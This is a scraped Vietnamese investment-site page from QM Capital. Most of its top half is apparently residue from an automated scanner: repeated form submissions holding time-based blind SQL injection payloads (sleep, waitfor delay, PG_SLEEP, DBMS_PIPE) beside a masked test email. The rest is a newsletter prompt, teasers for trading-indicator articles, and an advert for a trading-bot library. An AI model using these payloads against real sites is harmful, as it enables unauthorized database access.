(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

555

ubaTaeCJ

tes****@example.com-1 waitfor delay '0:0:15' --

555

ubaTaeCJ

tes****@example.comI1SFALxc'; waitfor delay '0:0:15' --

555

ubaTaeCJ

tes****@example.com96HDkd9P' OR 197=(SELECT 197 FROM PG_SLEEP(15))--

555

ubaTaeCJ

tes****@example.comOWlGyG9B') OR 708=(SELECT 708 FROM PG_SLEEP(15))--

555

ubaTaeCJ

tes****@example.comvg0bsBSW')) OR 198=(SELECT 198 FROM PG_SLEEP(15))--

555

ubaTaeCJ

tes****@example.com'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

555

ubaTaeCJ

tes****@example.com'"

555

ubaTaeCJ

tes****@example.com

555

ubaTaeCJ

tes****@example.com

555

if(now()=sysdate(),sleep(15),0)

tes****@example.com

555

ubaTaeCJ0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

tes****@example.com

555

ubaTaeCJ0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

tes****@example.com

555

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

tes****@example.com

555

ubaTaeCJ-1 waitfor delay '0:0:15' --

tes****@example.com

555

ubaTaeCJIY8jER0Z'; waitfor delay '0:0:15' --

tes****@example.com

555

ubaTaeCJwToYRkxm' OR 913=(SELECT 913 FROM PG_SLEEP(15))--

tes****@example.com

555

ubaTaeCJ7xTcZfqJ') OR 292=(SELECT 292 FROM PG_SLEEP(15))--

tes****@example.com

555

ubaTaeCJq67WyUp6')) OR 778=(SELECT 778 FROM PG_SLEEP(15))--

tes****@example.com

555

ubaTaeCJ'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

tes****@example.com

555

ubaTaeCJ'"

tes****@example.com

555

@@MjpGo

tes****@example.com

555

ubaTaeCJ

tes****@example.com

555

ubaTaeCJ

tes****@example.com

555

ubaTaeCJ

tes****@example.com

555

ubaTaeCJ

tes****@example.com

555

ubaTaeCJ

tes****@example.com

555

ubaTaeCJ

tes****@example.com

555

ubaTaeCJ

tes****@example.com

555

ubaTaeCJ

tes****@example.com

555

ubaTaeCJ

tes****@example.com

555

ubaTaeCJ

tes****@example.com

555

ubaTaeCJ

tes****@example.com

555

ubaTaeCJ

tes****@example.com

555

ubaTaeCJ

tes****@example.com

555

ubaTaeCJ

tes****@example.com

555

ubaTaeCJ

tes****@example.com

555

ubaTaeCJ

tes****@example.com

555

ubaTaeCJ

tes****@example.com

555

ubaTaeCJ

tes****@example.com

555

ubaTaeCJ

tes****@example.com

555

ubaTaeCJ

tes****@example.com

555

ubaTaeCJ

tes****@example.com

555

ubaTaeCJ

tes****@example.com

555

ubaTaeCJ

tes****@example.com

555

Đăng ký nhận tin

Nhập Email để nhận được bản tin mới nhất từ QM Capital.

Bài viết liên quan

Danh mục của bạn đang ngầm giả định điều gì về tương lai thị trường?
05/02/2026
66 lượt đọc

Danh mục của bạn đang ngầm giả định điều gì về tương lai thị trường? C

Một danh mục đầu tư, dù được xây dựng cẩn trọng đến đâu, cũng luôn chứa đựng những giả định ngầm về tương lai. Những giả định này hiếm khi được viết ra thành lời, nhưng lại quyết định cách danh mục phản ứng khi thị trường đi vào những trạng thái bất lợi. Vấn đề không nằm ở việc có giả định hay không, mà ở chỗ nhà đầu tư có ý thức được những giả định đó hay không.

Khủng hoảng tài chính không phải thiên nga đen, nó lặp lại theo cấu trúc
05/02/2026
72 lượt đọc

Khủng hoảng tài chính không phải thiên nga đen, nó lặp lại theo cấu trúc C

Trong diễn giải phổ biến về thị trường tài chính, các cuộc khủng hoảng lớn thường được mô tả như những sự kiện hiếm, bất ngờ và không thể dự đoán – thường được gọi chung dưới khái niệm “thiên nga đen”.

Top 5 hành vi khiến nhà đầu tư thua không phải vì thiếu kiến thức, mà vì…
04/02/2026
81 lượt đọc

Top 5 hành vi khiến nhà đầu tư thua không phải vì thiếu kiến thức, mà vì… C

Nhiều người nghĩ thua lỗ đến từ việc chọn sai cổ phiếu, vào sai điểm, hoặc thiếu công cụ phân tích. Nhưng nếu nhìn đủ lâu, bạn sẽ thấy một thứ lặp đi lặp lại ở hầu hết tài khoản: thua lỗ thường xuất phát từ hành vi, không phải từ “thiếu chỉ báo”.

Năm chỉ báo quen thuộc – và cách chúng thực sự được dùng trong chiến lược trend-following
01/02/2026
129 lượt đọc

Năm chỉ báo quen thuộc – và cách chúng thực sự được dùng trong chiến lược trend-following C

Trong trading, “theo xu hướng” (trend-following) là một trong những khái niệm được nhắc tới nhiều nhất, nhưng cũng bị hiểu sai nhiều nhất. Không ít người nghĩ rằng trend-following đơn giản là mua khi giá tăng, bán khi giá giảm, hoặc gắn vài chỉ báo lên chart rồi chờ tín hiệu.

Bollinger Bands là gì, dùng thế nào, và vì sao chiến lược “quen mà sai” xuất hiện rất nhiều?
01/02/2026
117 lượt đọc

Bollinger Bands là gì, dùng thế nào, và vì sao chiến lược “quen mà sai” xuất hiện rất nhiều? C

Bollinger Bands thường được giới thiệu như một công cụ “đơn giản mà hiệu quả”. Giá chạm dải trên thì được coi là quá mua, chạm dải dưới thì được coi là quá bán. Ý tưởng nghe rất tự nhiên: giá đi quá xa mức trung bình thì sẽ quay về. Với nhiều nhà đầu tư mới, đây là một trong những chiến lược đầu tiên họ tiếp cận, vì nó trực quan, dễ hiểu và có vẻ rất hợp lý về mặt logic.

Relative Strength Index (RSI): vì sao chỉ báo quen thuộc này thường bị hiểu sai?
28/01/2026
138 lượt đọc

Relative Strength Index (RSI): vì sao chỉ báo quen thuộc này thường bị hiểu sai? C

Relative Strength Index (RSI) là một trong những chỉ báo kỹ thuật phổ biến nhất trên thị trường tài chính. Với rất nhiều nhà đầu tư, RSI gần như đồng nghĩa với một quy tắc đơn giản: RSI trên 70 là quá mua, dưới 30 là quá bán. Từ đó, RSI được sử dụng như một công cụ bắt đỉnh đáy trực quan, nhanh gọn và “có vẻ hợp lý”.

video-image

Truy Cập Miễn Phí Thư Viện Bot Tín Hiệu Giao Dịch Tự Động

Được nghiên cứu và phát triển bởi các chuyên gia từ QMTrade và cộng đồng nhà đầu tư chuyên nghiệp.

Truy cập ngay!